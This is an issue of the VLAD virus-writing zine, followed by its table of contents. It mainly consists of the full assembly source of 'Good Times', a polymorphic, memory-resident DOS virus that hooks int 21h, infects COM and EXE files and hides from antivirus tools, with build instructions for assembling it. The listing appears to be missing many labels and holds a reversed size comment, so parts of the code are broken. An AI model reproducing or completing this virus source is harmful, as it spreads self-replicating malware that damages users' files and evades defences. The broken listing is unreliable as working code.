Virus Labs & Distribution
VLAD #4 - Good Times!

;                        Good Times
;                           by 
;                        Qark [VLAD]
; Infects COM files between 60000 and 1024 bytes in size.  It traverses the
; file by following any jumps/calls at the immediate start, and writes a call
; to the main virus body there.
; Infects EXE files in the standard manner.  Won't infect Win EXE files,
; EXE files without FFFF in the maxmem field and EXE files that use overlays.
; It is polymorphic because it uses RHINCE to generate random length
; decryptors.
; Also...
;       The act of loading the file into a mail server's ASCII
;       buffer causes the "Good Times" mainline program to
;       initialize and execute.
; Remember to email all your friends, warning them about Good Times!
; To assemble the virus, you will require a86, and the source to RHINCE.
; The RHINCE source needs to be named '' and the label 'polycode'
; must be removed from it.

        org     0

        mov     bp,sp

        call    next                    ;IP onto the stack

        mov     si,[bp-2]               ;SI=delta+offset next
        sub     si,offset next          ;SI=delta
        lea     ax,word ptr [si+offset next_ret]        ;AX=offset next_ret
        mov     [bp-2],ax               ;We will RET to next_ret now.
        push    ds

        mov     ax,3d76h
        int     21h
        cmp     ax,763dh
        je      resident

        mov     ax,ds
        dec     ax
        mov     ds,ax

        xor     di,di

        cmp     byte ptr [di],'Y'
        jbe     resident
        sub     word ptr [di+3],(offset stack_end /16) + 1
        sub     word ptr [di+12h],(offset stack_end /16) + 1
        mov     ax,word ptr [di+12h]
        mov     es,ax
        push    cs
        pop     ds
        mov     cx,offset end_virus
        push    si
        rep     movsb

        mov     ds,cx                   ;CX=0 from the rep movsb

        mov     si,21h*4
        mov     di,offset i21
        mov     word ptr [si-4],offset int21handler
        mov     word ptr [si-2],es
        pop     si
        pop     ds

        push    ds
        pop     es

        cmp     byte ptr cs:[si+offset com_exe],1
        je      exe_exit
        db      0bfh                    ;MOV DI,xxxx
        ret_point       dw      100h

        sub     word ptr [bp],3         ;Convert the original call.
        add     si,offset old4

        mov     ax,ds                   ;AX=DS=PSP
        add     ax,10h                  ;Point to start of executable code.

        add     word ptr cs:[si+offset jump+2],ax       ;Fix CS

        ;Restore SS:SP
        mov     sp,word ptr cs:[si+offset orig_sp]
        add     ax,word ptr cs:[si+offset orig_ss]
        mov     ss,ax

        jmp     $+2                     ;Clear prefetch.
        db      0eah                    ;Far jump
        jump    dd      0               ;CS:IP from EXE header.

        orig_sp dw      0
        orig_ss dw      0

com_exe db      0               ;COM = 0  EXE = 1

        db      ' Good Times by Qark/VLAD '

        push    ax
        xchg    ah,al
        cmp     al,3dh
        je      res_test
        cmp     al,43h
        je      infect
        cmp     al,4bh
        je      infect
        cmp     al,56h
        je      infect
        pop     ax
        db      0eah                    ;JMP orig21
        i21     dd      0
        cmp     ah,76h                  ;Check for our little res test.
        jne     infect
        inc     sp                      ;AX is on the stack.
        inc     sp

        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    bp
        push    ds
        push    es

        mov     si,dx
        cmp     al,'.'
        jne     find_dot
        lodsb                   ;Load AL with the first letter of the ext.

        ;I only check the first letter of the file name, but that doesn't
        ;concern me because I check for the MZ/ZM or look for a E9 otherwise.

        cmp     al,'C'
        je      ok_name
        cmp     al,'E'
        je      ok_name
        cmp     al,'c'
        je      ok_name
        cmp     al,'e'
        je      ok_name
        jmp     ipop_exit

        ;call test_name

        mov     ax,3d02h
        call    int21h
        jc      iipop_exit
        xchg    bx,ax                   ;File handle into BX
        push    cs
        pop     ds                      ;DS=CS
        push    cs
        pop     es                      ;ES=CS
        mov     ah,3fh
        mov     dx,offset old4
        mov     si,dx                   ;SI=Offset end_virus
        mov     cx,1ch
        call    int21h

        mov     ax,word ptr [si]

        or      ax,2020h                ;Convert to lowercase for anti
        cmp     ax,'mz'
        je      exe_infect
        cmp     ax,'zm'
        je      exe_infect

        jmp     com_infect
        jmp     close_exit

        cmp     word ptr [si+1ah],0     ;Don't infect overlays.
        jne     eclose
        cmp     word ptr [si+18h],40h   ;Don't infect windows executables.
        jae     eclose
                                ;If total memory isn't allocated, don't
        cmp     word ptr [si+0ch],0ffffh        ;infect.
        jne     eclose

        cmp     word ptr [si+12h],'BV'  ;When 'Virus Buster' generically
        je      eclose                  ;restores EXE files, it leaves this
                                        ;signature in the checksum, which
                                        ;is handy for us because it means:
                                        ;A) we don't infect the files of
                                        ;a person who uses scanners, and
                                        ;B) AVers can't use it as part of
                                        ;a signature.

        mov     byte ptr com_exe,1      ;Signal EXE file.

        mov     ax,word ptr [si+0eh]
        mov     word ptr orig_ss,ax
        mov     ax,word ptr [si+10h]
        mov     word ptr orig_sp,ax     ;Saved the SS:SP

        push    si
        add     si,14h
        mov     di,offset jump
        movsw                           ;Saved the CS:IP
        pop     si
        call    lseek_end
        ;File length is in DX:AX
        mov     cx,16
        div     cx                      ;Paragraphs.

        sub     ax,word ptr [si+8]      ;Subtract header size.

        mov     word ptr [si+14h],dx    ;IP into header
        mov     word ptr [si+16h],ax    ;CS into header
        push    dx
        add     dx,offset stack_end

        dec     ax
        mov     word ptr [si+0eh],ax    ;We'll make SS=CS-1
        mov     word ptr [si+10h],dx    ;SP=IP+stack_end
        and     dx,0fffeh

        pop     bp
        mov     cx,offset end_virus
        xor     dx,dx
        push    bx
        push    si
        call    mut_eng
        pop     si
        pop     bx
        call    save_time
        mov     ah,40h
        call    int21h
        jc      close_exit
        call    lseek_end
        ;File length into DX:AX

        mov     cx,512                  ;Page size.
        div     cx

        or      dx,dx
        jz      no_page_fix
        inc     ax                      ;Add the last partial page.
        mov     word ptr [si+4],ax      ;Number of pages
        mov     word ptr [si+2],dx      ;Partial page.

        call    lseek_start

        mov     word ptr [si+12h],'BV'  ;Our marker.

        mov     ah,40h                  ;Write header.
        mov     dx,si
        mov     cx,1ch
        call    int21h

        call    restore_time

        mov     ah,3eh
        call    int21h

        pop     es
        pop     ds
        pop     bp
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx

        jmp     pop_exit


        mov     byte ptr com_exe,0      ;Signal COM infection.
        mov     word ptr filepointer,0  ;Point to start of the file.

        mov     al,byte ptr [si]
        cmp     al,0e9h                 ;JMP instruction
        je      chk_entry
        cmp     al,0e8h                 ;CALL instruction
        je      chk_entry
        cmp     al,0ebh                 ;JMP 'short' instruction
        jne     write_virus

        mov     al,byte ptr [si+1]
        add     al,2
        jmp     short smalljmp
        mov     ax,word ptr [si+1]      ;Jump distance.
        add     ax,3
        add     ax,word ptr filepointer
        mov     word ptr filepointer,ax
        push    ax

        add     ax,100h                 ;Calculate where to return stuff to.
        mov     word ptr ret_point,ax

        pop     dx
        mov     al,0
        push    dx
        call    lseek

        mov     dx,offset old4          ;Read the original bytes there.
        mov     cx,4
        mov     ah,3fh
        call    int21h

        pop     dx
        mov     al,0
        call    lseek                   ;Lseek back there.

        cmp     byte ptr old4 + 3,'H'   ;Check if its already infected.
        jne     recurse_entry
        jmp     closejmp                ;Must be infected...


        call    lseek_end
        or      dx,dx
        jnz     close_exit
        cmp     ax,60000
        ja      close_exit
        cmp     ax,1024
        jb      close_exit

        xchg    dx,ax                   ;File size into DX

        mov     ax,word ptr filepointer ;Where the jump goes to.
        add     ax,3                    ;Jumps are 3 bytes.
        sub     dx,ax                   ;Calculate new jump offset.
        mov     word ptr new_jump+1,dx  ;Move it.
        sub     ax,3                    ;This is the physical disk position.

        mov     dx,ax
        mov     al,0
        call    lseek                   ;Lseek to the jump entry.

        call    save_time
        mov     cx,4                    ;Write the new jump. (a call :)
        mov     dx,offset new_jump
        mov     ah,40h
        call    int21h
        jc      closejmp
        call    lseek_end
        add     ax,100h
        mov     cx,offset end_virus
        mov     bp,ax
        xor     dx,dx
        push    bx
        call    mut_eng
        pop     bx

        mov     ah,40h
        ;mov     cx,offset end_virus
        ;xor     dx,dx
        call    int21h

        call    restore_time

        jmp     close_exit

int21h:                         ;Simulated int 21 call.
        call    dword ptr cs:i21
Lseek_End:                      ;Lseek to the end.
        mov     al,2
        jmp     short lsk
Lseek_Start:                    ;Lseek to the start.
        mov     al,0
        xor     dx,dx
Lseek:                          ;General Lseek.
        xor     cx,cx
        mov     ah,42h
        call    int21h
        push    ax
        push    cx
        push    dx

        mov     ax,5700h
        call    int21h

        mov     word ptr time,cx
        mov     word ptr date,dx

        pop     dx
        pop     cx
        pop     ax
        push    ax
        push    cx
        push    dx

        db      0bah            ;MOV DX,xxxx
        date    dw      0

        db      0b9h            ;MOV CX,xxxx
        time    dw      0

        mov     ax,5701h
        call    int21h

        pop     dx
        pop     cx
        pop     ax

        include              ;Rhince's polymorphic engine.

new_jump        db      0e8h,0,0,'H'            ;Actually its a CALL.
filepointer     dw      0
old4    db      0cdh,20h,0,0
        db      1ch dup (0)
polycode:                               ;Rhince needs this here.
        db      500 dup (0)             ;Make some room for rhince.
        dup_size        equ     offset end_virus
        db      dup_size dup (0)

ARTICLE.0_0       Hidden Area Story By QuantumG


ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


Tax Office
ARTICLE.2_2       Fight Back!
ARTICLE.2_3       Interviews
ARTICLE.2_4       Cryptanalysis
ARTICLE.2_5       Slovakia
ARTICLE.2_6       TBMem Flaws
ARTICLE.2_7       F-Prot Troubles


Win Infection
ARTICLE.3_2       WinVir14 Disasm
ARTICLE.3_3       Andropinis
ARTICLE.3_4       Super Virus-2
ARTICLE.3_5       VTBoot
ARTICLE.3_6       Ebbelwoi VQ7
ARTICLE.3_7       Unix Viruses


Virus Descriptions
ARTICLE.4_2       Ender Wiggin
ARTICLE.4_3       WinSurfer
ARTICLE.4_4       Antipode 2.0
ARTICLE.4_5       Bane
ARTICLE.4_7       Tasha Yar


ARTICLE.5_2       ART v2.2
ARTICLE.5_3       Good Times!
ARTICLE.5_4       DOS Idle
ARTICLE.5_5       Neither
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

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